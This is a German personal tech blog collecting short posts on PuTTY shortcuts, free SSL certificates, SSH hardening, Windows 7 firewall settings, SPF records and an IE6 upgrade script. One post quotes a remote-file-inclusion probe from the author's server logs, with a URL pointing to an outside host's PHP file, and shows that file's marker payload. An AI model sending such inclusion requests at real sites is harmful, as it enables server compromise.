Ich nutze jetzt schon seit einiger Zeit PuTTY für die Verbindung zu meinem vServer. Da ich gerade auf die komfortable und sicherere PublicKey Authentication umgestiegen bin, hier der passende Tip, wie man für Putty und Puttyagent die Logindaten bereits per Verknüpfung übergibt.
Wenn man in PuTTY bereits ein Profil gespeichert hat, kann man dieses später mit einem an die Verknüpfung zur putty.exe angehängtes -load wieder aufrufen. Damit auch der Loginname übergeben wird, kann man noch -l angeben. (Natürlich ohne die <> Klammern).
Bsp.: "C:\Program Files (x86)\Putty\putty.exe" -load <Profilname> -l <Loginname>
Weitere Optionen findet man in der Dokumentation, ab Punkt 3.8. “The PuTTY commandline”. Es ist sogar möglich, ein Passwort zu übergeben, worauf ich sicherheitshalber verzichte.
Wer sich häufig verbindet, dem ist eher zu empfehlen, den Puttyagent zu nutzen. Hier reicht es, wenn der PrivateKey einmal freigeschaltet wird. Bis der Agent wieder geschlossen wird, merkt sich pagent.exe die Passphrase und es reicht, wenn in der nächsten SSH-Session nur der Username angegeben wird.
Für Pagent sieht die Verknüpfung mit Pfad zum Key so aus:
"C:\Program Files (x86)\Putty\pageant.exe" <Pfad-zur-*.ppk-Datei>
Wer sich schon einmal ein self-signed Zertifikat erstellt hat wird wissen, dass alle Browser vor dem Aufbau einer Verbindung eine nervige, bzw. abschreckende Warnung ausgeben.
Wer ein SSL-Zertifikat von einer anerkannten Autorität haben wollte, musste dafür bisher, auch wenn es nur um ein Hobbyprojekt ging, tief in die Tasche greifen.
Einen guten Ansatz hat die spendenfinanzierte Gemeinschaft CAcert.org verfolgt, konnte es aber bisher nicht in die Stammzertifikatslisten schaffen.
Jetzt bietet der kommerzielle Anbieter StarCom mit StarSSL kostenlose SSL-Zertifikate an, die bis auf Opera allen wichtigen Browsern bekannt sind.
Die Anmeldung ist etwas gewöhnungsbedürftig. Zuerst einmal bekommt man kein Passwort, sondern ein Client-Zertifikat, mit dem man sich in seinem Account anmeldet (und was man gut aufheben sollte). Zum Anderen fand ich die Menüführung kompliziert.
Vor allem sollte man sich bewusst sein, dass die erstellten Zertifikate nach einem Jahr erneuert werden müssen und es keine kostenlosen Wildcard-Zertifikate gibt.
Während der Installation wird zwar angeboten, ein Schlüsselpaar generieren zu lassen, es ist aber empfehlenswert seinen Privaten Schlüssel selbst zu erstellen.
Eine sehr gut bebilderte Anleitung habe ich bei Lernschmiede.de – kostenfreie Zertifikate gefunden.
Bei heise.de gibt es ebenfalls eine kurze Anleitung.
Auch das StarCom Wiki bietet eine ausführliche Installationshilfe.
Nach der Neuinstallation eines Servers mit Internetanbindung sollte man zuerst einmal seine SSH-Verbindung absichern.
Dazu sind folgende Schritte sinnvoll und können an der /etc/ssh/sshd_config durchgeführt werden:
- Default SSH Port ändern
- Root Login verbieten
- Nur einem User den Login erlauben
- Diesem User alle Rechte, bis auf su entziehen
- Fail2ban oder DenyHosts installieren
- Evtl. SSH Key Auth statt Passwort nutzen
- Evtl. SSH per IPTables nur für DynDNS IP erlauben
Die meisten der oben aufgeführten Schritte werden auf wiki.debianforum.de erklärt.
Foto CC by Croila
Es ist schon irre. Kaum ein Tag vergeht ohne News über Google. Entweder ein neuer Dienst wird angekündigt oder ein Rechtsstreit angefangen.
Klar, große Firmen haben es bei all den Patenten und Gesetzten selbst mit einer großen Rechtsabteilung nicht leicht.
Das tolle an Google: Alles ist umsonst. Wirklich?
Googles Haupteinnahmequelle, die Werbung, ist ja bekannt. Also nicht ganz umsonst.
Viel höher ist für den Nutzer aber der Preis für den Verlust seiner Privatsphäre. Wer garantiert mir, dass Google mein Nutzungsprofil irgendwann wieder löscht und nicht gar mit anderen Google-Diensten abgleicht.
Sollte dies eines Tages geschehen, wären wir für Google wirklich gläserne Nutzer.
Hier einmal eine Liste was im Worst Case alles über uns bekannt ist: Mehr…
Die Firewall in Windows XP war mehr oder weniger uninteressant, weil sie lediglich eingehende Verbindungen kontrollieren konnte. Hatte man sich einen Trojaner oder Keylogger eingefangen, konnte dieser ohne Nachfrage Dateien ins Netz versenden. Windows 7 hat jetzt endlich eine Firewall, die auch ausgehenden Traffic kontrolliert. Leider ist das zugunsten von weniger Userinteraktion keine Standardeinstellung. Wer Ausgehenden Traffic kontrollieren möchte Klickt Start -> Systemsteuerung -> System und Sicherheit -> Windows-Firewall -> Erweiterte Einstellungen im Mittleren Fenster ganz unten dann auf Windows-Firewalleigenschaften. Dort kann man für das jeweilige Profil bei Status die Ausgehende Verbindungen auf “Blockieren” setzen. Das heißt leider nicht, wie ich durch einen Kommentar aufgeklärt wurde, dass eine Nachfrage erscheint, sondern, dass man nun nach der Whitelist Methode, wie schon in Vista, allen benötigten Programmen in den Firewalloptionen einzeln Zugriff gewähren muss. Die Default Einstellungen findet man im Dokument “HomeGroup and Firewall Interaction” auf der Microsoft Seite. Die Nachfrage erscheint tatsächlich nur bei eingehenden Verbindungen. Warum dieses Feature für ausgehende Verbindungen nicht verfügbar ist bleibt mir ein Rätsel… Einzige Lösung scheint mir momentan die Freeware Window 7 Firewall Control von Sphinx zu sein, die als 3rd Party Applikation aber wieder ein Risiko darstellt.
Ich hatte mit meinem Nokia e71 das Problem, dass es die Self-Signed Zertifikate von Hosteurope resp. Comodo nicht anerkennen wollte. Daher blieb nur die Möglichkeit die Zertifikate manuell runterzuladen, um nicht nur per “Nur diesmal akzeptieren” an seine Mails zu kommen.
Hosteurope bietet die Zertifikate in seiner FAQ zum Download an:
http://faq.hosteurope.de/index.php?cpid=14507
Ansonten hilft auch ein Speichern unter und Öffnen des Zertifikats und unter Details -> in Datei kopieren wählen und im DER Format mit der Endung .crt exportieren und bei redelijkheid.com hochladen, und mit dem Handy den angegebenen Link ansteuern. Natürlich kann man die Datei alternativ auf seinen eigenen Server stellen und in die .htaccess folgenden Mimetyp eintragen: AddType application/x-x509-ca
Habe gerade etwas interessantes im Host Europe FAQ entdeckt.
Hier die entscheidende Stelle:
Wenn Sie bei uns Produkte betreiben, mit denen Sie selbst derartige Dienste anbieten, z.B. dedizierte oder virtuelle Serverprodukte, führen wir selbst keine Speicherung durch. Diese liegt dann in Ihrem Aufgabenbereich.
Wer einen privaten E-Mail Server betreibt, ist von der Pflicht zur Vorratsdatenspeicherung ausgenommen.
Wenn man bedenkt, dass man teilweise für 1,69€ einen für E-Mail ausreichenden V-Server bekommt…
Terroristen werden also nicht auf Kurierdienste umsteigen müssen.
Zum Betrieb eines Servers und den Spamproblemen, die man sich damit einhandelt, erfährt man einiges in CCC ausgabe 104.
Ob Google große Investitionen tätigen musste, um die Verkehrsdaten für so lange Zeit zu speichern? 
Ich hatte gerade Probleme, Mails von meiner Domain an Yahoo zu senden. Die Mails, die von meinem PC und nicht über den Webmailer liefen, landeten alle mit starker Verzögerung im Spamfilter. Das heißt zwar nichts, da selbst die Mails des yahooeigenen Supports dort hineingefiltert wurden, ohne dass ich Filterregeln eingerichtet, o.ä. getan habe. Dennoch wollte ich sichergehen, dass meine Mails immer ankommen.
Wer bei einem der “Großen”, also GMX, Google etc. ist, wird weniger Probleme mit Mailfiltern haben, da sich große Mailprovider untereinander zertifizieren. Ich hatte solche Möglichkeiten, wie Remote DNS Eintrag o.ä. aufgrund meiner dynamischen IP leider nicht. Was aber machbar ist, ist das Einrichten eines SPF Records (Sender Policy Framework). Dieser wird beim Nameserver meist als txt gehostet und erlaubt allen Mailprovidern die Rückfrage, ob es den Absender wirklich gibt.
SpamAssassin bei Host Europe wertet einen solchen Eintrag mit -2.5 im Spamcount. Bei +5 wird eine Mail dort gefiltert. Da ich bei anderen Mailern ein ähnliches Vorgehen vermute lohnt ein solcher Eintrag allemal. Mehr…
Ein fleißiger Hacker mit folgender Hausnummer 116.122.158.207 hat heute diese Adresse aufrufen wollen:
http://www.knevels.org///admin.php?includes&config[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt??
Falls jemand den Hack kennt:was bewirkt er, wenn er funktioniert und bei welcher WordPress version? Sieht für mich aus wie das Einfügen eines neuen Users.
Folgenden Inhalt hatte die Textdatei:
zfxid.txt<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
Noch ein Item auf meiner Todo liste…
Ist doch echt traurig, dass auf diesem recht techniklastigen Blog immer noch Leute mit einem 7 Jahre alten Browser herumsurfen.
Es ist ja nicht nur so, dass er die meisten Webseiten nicht mehr vernünftig anzeigt. Er ist auch völlig unsicher, solange er nicht in einer Sandbox ausgeführt wird.
Obwohl die Statistik wenig aussagefähig ist, fällt auf, dass sich der Explorer 8 recht schnell gegen Version 7 durchgesetzt hat.
Nicht schlecht ist die Idee, User mit einem Popup auf das Update aufmerksam zu machen, wobei ich davon absehe, da ich die meisten alten Browsern in Firmen mit hoffnungslos überforderter IT-Abteilung vermute. Wer die Vintagesurfer dennoch bekehren möchte, hier der Code:
<!–[if lte IE 6]>
<script>var LETSKILLIE6_DELAY=14;</script>
<script src=”http://letskillie6.googlecode.com/svn/trunk/letskillie6.pack.js”></script>
<![endif]–>
Den Hinweis bekommen also nur ie6 Besucher zu sehen, und das auch nur alle 14 Tage.
via neoease